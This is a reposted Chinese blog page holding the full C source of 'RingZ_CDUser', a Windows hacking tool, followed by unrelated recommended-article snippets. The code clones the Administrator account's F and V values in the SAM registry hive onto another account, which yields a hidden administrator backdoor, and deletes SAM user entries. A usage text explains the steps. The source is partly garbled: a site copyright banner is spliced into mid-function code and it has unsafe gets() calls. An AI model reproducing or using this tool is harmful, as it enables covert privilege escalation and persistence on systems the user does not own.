[转载]克隆/删除任意用户(RingZ_CDUser)

最新推荐文章于 2022-02-25 21:57:21 发布
最新推荐文章于 2022-02-25 21:57:21 发布
阅读量875 收藏
点赞数
分类专栏: C & C++ 文章标签: user buffer delete null access c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kernet/article/details/364943
版权
作者:dahubaobao   来源:中国红客联盟    更新日期:2005-01-18    浏览次数:<script language="Javascript" src="http://www.chinahonker.com/view.php?id=51" type="text/javascript"> </script>
 
=====================================================================
#include <windows.h>
#include <string.h>
#include <stdio.h>
char name[50][30];
int KeyN=0;
//OpenKey(),ViewUser(),ListUser()函数用到的变量
void Sid (char *sid);
//删除安全标识符
void User (char *user);
//删除用户名
void OpenKey (char *key);
int ViewUser (char *key);
int ListUser (void);
//显示用户名对应的安全标识符
int Clone (char *C_sid);
//克隆帐户
void Usage (void);
//帮助信息
void main (int argc, char *argv[])
{
char SID[10];
char C_Sid[10];
char USER[40];
int n;
for (n=1;n<argc;n++)
{
if (argv[n][0] == '-')
克隆/删除任意用户(RingZ_CDUser)
{
switch(argv[n][1])
{
case '?':
case 'h':
case 'H':Usage();
break;
case 'l':
case 'L':ListUser();
break;
case 'c':
case 'C':printf("Please Input Clone SID:");
gets(C_Sid);
if (strlen(C_Sid)<=10)
Clone(C_Sid);
else
printf("Error/n");
break;
case 's':
case 'S':printf("Please Input Delete SID:");
gets(SID);
if (strlen(SID)<=10)
Sid(SID);
else
printf("Error/n");
break;
case 'u':
case 'U':printf("Please Input Delete USER:");
gets(USER);
if (strlen(USER)<=40)
User(USER);
else
printf("Error/n");
break;
}
}
}
}
void Sid (char *sid)
{
HKEY hkey;
DWORD ret;
char C_sid[10];
ZeroMemory(C_sid,10);
strcpy(C_sid,"00000"); //填充SID中的前5位
strcat(C_sid,sid); //传递剩余3位,并继续填充
//打开注册表,成功返回值0(SUCCESS)
ret=RegOpenKey(HKEY_LOCAL_MACHINE, //根键名或已打开项的句柄
"SAM//SAM//Domains//Account//Users//", //要打开的项名
&hkey); //装载打开项的句柄
if (ret==ERROR_SUCCESS)
;
else
return 0;
//删除SID,成功返回值0(SUCCESS)
ret=RegDeleteKey(hkey,C_sid);
if (ret==ERROR_SUCCESS)
printf("Success Delete Key(SID)/n"); //打印成功消息
else
{
printf("Delete Key FAIL(SID)/n"); //打印失败消息
return 0;
}
RegCloseKey(hkey); //关闭以打开的注册表项
}
void User (char *user)
{
HKEY hkey;
DWORD ret;
char C_user[40];
ZeroMemory(C_user,40);
strcpy(C_user,"");
strcat(C_user,user);
ret=RegOpenKey(HKEY_LOCAL_MACHINE,
"SAM//SAM//Domains//Account//Users//Names//",
&hkey);
if (ret==ERROR_SUCCESS)
;
else
return 0;
ret=RegDeleteKey(hkey,C_user);
if (ret==ERROR_SUCCESS)
printf("Success Delete Key(USER)/n");
else
{
printf("Delete Key FAIL(USER)/n");
return 0;
}
RegCloseKey(hkey);
}
void OpenKey (char *key)
{
HKEY hkey;
DWORD dwIndex=0,lpcbname=100,ret=0;
char T_name[100],Buffer[100];
FILETIME lpftlast;
int i=0;
ZeroMemory(Buffer,100);
ZeroMemory(T_name,100);
ZeroMemory(name,1500);
RegOpenKeyEx(HKEY_LOCAL_MACHINE, //根键名或已打开项的句柄
key, //传递一个参数,欲打开的注册表项
0, //未用,设为0即可
KEY_ALL_ACCESS, //带有前缀KEY_??的一个或多个常数。
//它们的组合描述了允许对这个项进行哪些操作
&hkey);
for(i=0;ret==ERROR_SUCCESS;i++,dwIndex++)
{
ret=RegEnumKeyEx(hkey,dwIndex,T_name,&lpcbname,
NULL,NULL,NULL,&lpftlast);
//dwIndex:欲获取的子项的索引。第一个子项的索引编号为零
//T_name:用于装载指定索引处项名的一个缓冲区
//&lpcbname:指定一个变量,用于装载lpName缓冲区的实际长度(包括空字符)。
//一旦返回,它会设为实际装载到lpName缓冲区的字符数量
//NULL:未用,设为零
//NULL:项使用的类名
//NULL:用于装载lpClass缓冲区长度的一个变量
//&lpftlast:FILETIME,枚举子项上一次修改的时间
strcat(name[i],T_name);
ZeroMemory(T_name,100);
lpcbname=100;
}
RegCloseKey(hkey);
//拼接用户名
for(KeyN=0;KeyN<i;KeyN++)
{
strcat(Buffer,name[KeyN]);
strcat(Buffer,"/n/r");
}
}
int ViewUser (char *key)
{
HKEY hkey;
DWORD lpType=0,ret;
char S_name[10];
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
key,
0,
KEY_ALL_ACCESS,
&hkey);
if(ret==ERROR_SUCCESS)
;
else
return 0;
RegQueryValueEx(hkey,NULL,NULL,
&lpType,NULL,NULL);
//NULL:要获取值的名字
//NULL:未用,设为零
//&lpType:用于装载取回数据类型的一个变量
//NULL:用于装载指定值的一个缓冲区
//NULL:用于装载lpData缓冲区长度的一个变量
wsprintf(S_name,"%X/n/r",lpType);
printf("%s",S_name);
return 1;
}
int ListUser (void)
{
int n;
char Buffer[70]="SAM//SAM//Domains//Account//Users//Names//";
char Temp[40]={'/0'};
OpenKey("SAM//SAM//Domains//Account//Users//Names");
for(n=0;n<KeyN;n++)
{
strcat(Buffer,name[n]);
wsprintf(Temp,name[n]);
strcat(Temp,"===>");
printf("%s",Temp);
ViewUser(Buffer);
strcpy(Buffer,"SAM//SAM//Domains//Account//Users//Names//");
}
return 1;
}
int Clone(char *C_sid)
{
HKEY hkey,C_hkey;
DWORD Type=REG_BINARY,SizeF=1024*2,SizeV=1024*10,ret;
char CloneSid[100];
LPBYTE lpDataF,lpDataV;
lpDataF = (LPBYTE) malloc(1024*2);
lpDataV = (LPBYTE) malloc(1024*10);
ZeroMemory(lpDataF,1024*2);
ZeroMemory(lpDataV,1024*10);
ZeroMemory(CloneSid,100);
strcpy(CloneSid,"SAM//SAM//Domains//Account//Users//00000");
strcat(CloneSid,C_sid);
ret= RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SAM//SAM//Domains//Account//Users//000001F4",
0,
KEY_ALL_ACCESS,
&hkey);
if(ret==ERROR_SUCCESS)
;
else
return 0;
ret = RegQueryValueEx(hkey,"F",NULL,
&Type,lpDataF,&SizeF);
if(ret==ERROR_SUCCESS)
;
else
return 0;
ret = RegQueryValueEx(hkey,"V",NULL,
&Type,lpDataV,&SizeV);
if(ret==ERROR_SUCCESS)
;
else
return 0;
ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
CloneSid,
0,
KEY_ALL_ACCESS,
&C_hkey);
if(ret==ERROR_SUCCESS)
;
else
return 0;
ret= RegSetValueEx(C_hkey,"F",0,
REG_BINARY,
lpDataF,
SizeF);
//C_hkey:根键名或已打开项的句柄
//“F”:要设置值的名字
//0:未用,设为零
//REG_BINARY:要设置的数量类型
//lpDataF:包含数据的缓冲区中的第一个字节
//SizeF:lpData缓冲区的长度
if(ret==ERROR_SUCCESS)
;
else
return 0;
ret=RegSetValueEx(C_hkey,"V",0,
REG_BINARY,
lpDataV,
SizeV);
if(ret==ERROR_SUCCESS)
printf("Clone User Success/n");
Copyright © 2000-2004 HUC All Rights Reserved.
中国红客网络技术联盟 www.cnhonker.com
webmaster@cnhonker.net
else
{
printf("Clone User FAIL/n");
return 0;
}
RegCloseKey(hkey);
RegCloseKey(C_hkey);
return 1;
}
void Usage (void)
{
fprintf
(stderr,"=====================================================================
"/t 克隆/删除任意用户/n"
"/t环境:Win2K Adv Server + Visual C++ 6.0/n"
"/t作者:dahubaobao/n"
"/t主页:www.RingZ.org/;n"
"/tOICQ:382690/n"
"/t邮件:dahubaobao@hotmail.com/n"
"/t声明:本帖由环行区(RingZ)原创,转载请注明出处,谢谢!/n"
"/n"
"/t使用方法:/n"
"/t/"-H/":帮助信息/n"
"/t/"-L/":列出系统中用户对应的SID/n"
"/t/"-C/":克隆帐户,输入SID即可/n"
"/t/"-S/":删除SID/n"
"/t 对应注册表HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users/n"
"/t/"-U/":删除用户名/n"
"/t 对应注册表HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//Names/n"
"/n"
"/t注意事项:/n"
"/t由于SID的前5位都是/"0/",所以不必输入,直接输入最后三位/n"
"/t例如:000001F5,则直接输入1F5,即可将Guest帐户删除/n"
"/t使用Regedt32将SAM键修改为Administrators可以访问/n"
"/t使用-C参数后,会弹出/"Clone SID:/"提示符,只需输入相应的SID即可克隆/n"
"/t使用-S参数后,会弹出/"Delete SID:/"提示符,只需输入相应的SID即可删除/n"
"/t使用-U参数后,会弹出/"Delete USER:/"提示符,只需输入相应的用户名即可删除/n"
"==========================================================================
kernet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Qt —— 自定义飞机仪表控件(附源码)
wx微信公众号“码农总动员”,获取更多编程知识
01-22 373
Qt —— 自定义飞机仪表控件(附源码)
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 3587
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
克隆/删除任意用户
12-19 907
代码:克隆/删除任意用户RingZ_CDUser) 作者:dahubaobao主页:http://www.ringz.org 邮件:[email protected] QQ:382690EXE在压缩包中,解压密码:www.ringz.org http://dahubaobao.go.nease.net/RingZ_CDUser.rar 欢迎进入环形区,一群技术狂热者的社区,ww
克隆/删除任意用户 dahubaobao
FreeXploiT
01-19 1938
Codz: #include #include #include char name[50][30]; int KeyN=0; //OpenKey(),ViewUser(),ListUser()函数用到的变量 void Sid (char *sid); //删除安全标识符 void User (char *user); //删除用户名 void OpenKey (char *
mysql amd.dll 后门_DLL后门清除完全篇
weixin_39626237的博客
01-19 118
作者:dahubaobao [Nuke Group]主页:http://www.ringz.org团体站点:http://www.digitalnuke.com/main/邮件:[email protected]:47809945工具及图片这里有下载 http://dahubaobao.go.nease.net/DLL.rar ,解压密码:www.ringz.org后门!相信...
注册表操作(RingZ_RgeEdit) RingZ_CDUser的扩展版本
03-20
注册表操作,注册表操作,注册表操作,注册表操作。
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8718
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3122
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1486
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2170
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
HTML实现学习网站首页
做技术,坚持才是最重要的,一时的热情只是暂时的进步
02-20 3894
项目访问 reset.css /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del
C语言经典小游戏之----推箱子
嵌入式技术开发
02-25 4562
在进行推箱子的实验中,可以使用对应的API函数来改变对应箱子的颜色,也需要根据,人在移动的过程中,可以通过方向键,并改变对应的颜色,从而实现控制人物的目的。 代码实现如下: #include<stdio.h> #include<stdlib.h> #include<string.h> #include<windows.h> #include<conio.h> int x = 0, y = 0; //存储当前使用的...
关于Dubbo的mock=true降级无法调用降级类ServiceMock的解决方案
weixin_45754452的博客
02-25 1274
问题 消费者使用mock=“true”,想调用TestServiceMock进行服务降级无法调用 原因 我的项目结构如下,首先要知道服务降级代码应该是谁执行的,服务降级是服务消费者也就是controller包处对应的服务执行的,因为我只是测试dubbo怎么使用,所以并没有分多模块,但完全可以把一个包理解为一个模块,再看下面配置文件 为什么可以把一个包当成一个模块呢,因为我把配置文件的scan改成controller包然后启动一个服务器,即消费者,如果把scan改成service则可以启动服务提供者服务器
Vue---Vue基础
前端与计算机相关知识的分享,博主的qq523235674
02-25 1339
一.Vue概述 二.Vue的基本使用 2.1Vue.js之hello world 基本实例 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Document</title> </.
如此优秀的JS轮播图,写完老师都沉默了
陈新科的博客
02-17 5831
雷迪森安的乡亲们,欢迎来到老实人的前端课堂,今天我们来写个骚气磅礴的轮播图吧,内容太干,建议收藏起来慢慢看,最后我还会教大家如何免费部署上线哦~ 正片 小轮播图滑动滚播,好不好看你说了算。 结构就两行 <div id="main"> <h1>something</h1> <div class="content"> <p>You can press <kbd>▲</kbd> <kbd&
TCP/IP网络编程---Linux系统下的TCP套接字编程
xxyneymar的博客
02-21 4176
目录 第一章 理解网络编程和套接字 1.1 网络编程和套接字概要 1.2 基于Linux的文件操作 1.2.1 底层文件访问和文件描述符 1.2.2 打开文件 1.2.3 关闭文件 1.2.4 将数据写入文件 1.2.5 读取文件中的数据 第二章 套接字类型与协议设置 2.1 套接字协议及其数据传输特性 2.1.1 关于协议 2.1.2 创建套接字 第三章 地址族与数据序列 3.1 分配给套接字的IP地址与端口号 3.1.1 网络地址 3.1.2 用于区分套接字的端口号 3
CSS -- 移动端适配技术学习
秋天,黄叶坠地,凉风有信。
02-20 1450
CSS中常用的计量单位,em,rem,px的区别,vwvh,vmin,vmax 的使用,移动端适配中使用到的技术,媒体查询CSS和JS的实现方法,Flex弹性布局,flexibleJS的介绍,rem + viewPort 缩放的技术
Docker整理篇(网络与数据卷)
weixin_43118617的博客
02-23 1283
docker网络与数据卷操作和基础命令
搭建React Native开发环境
dear_Wally的博客
02-24 3462
1、参考搭建开发环境 · React Native 中文网 2、安装依赖 必须安装的依赖有:Node、JDK 和 Android Studio 2.1、安装Node 安装包下载地址下载 | Node.js注意 Node 的版本应大于等于 12 下载node对应版本的安装文件,直接安装即可,安装完成之后。打开命令行,输入node --version 能够显示版本时,说明安装成功。 如果提示找不到该命令,可能是环境变量没有添加。把Node安装目录添加到环境...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值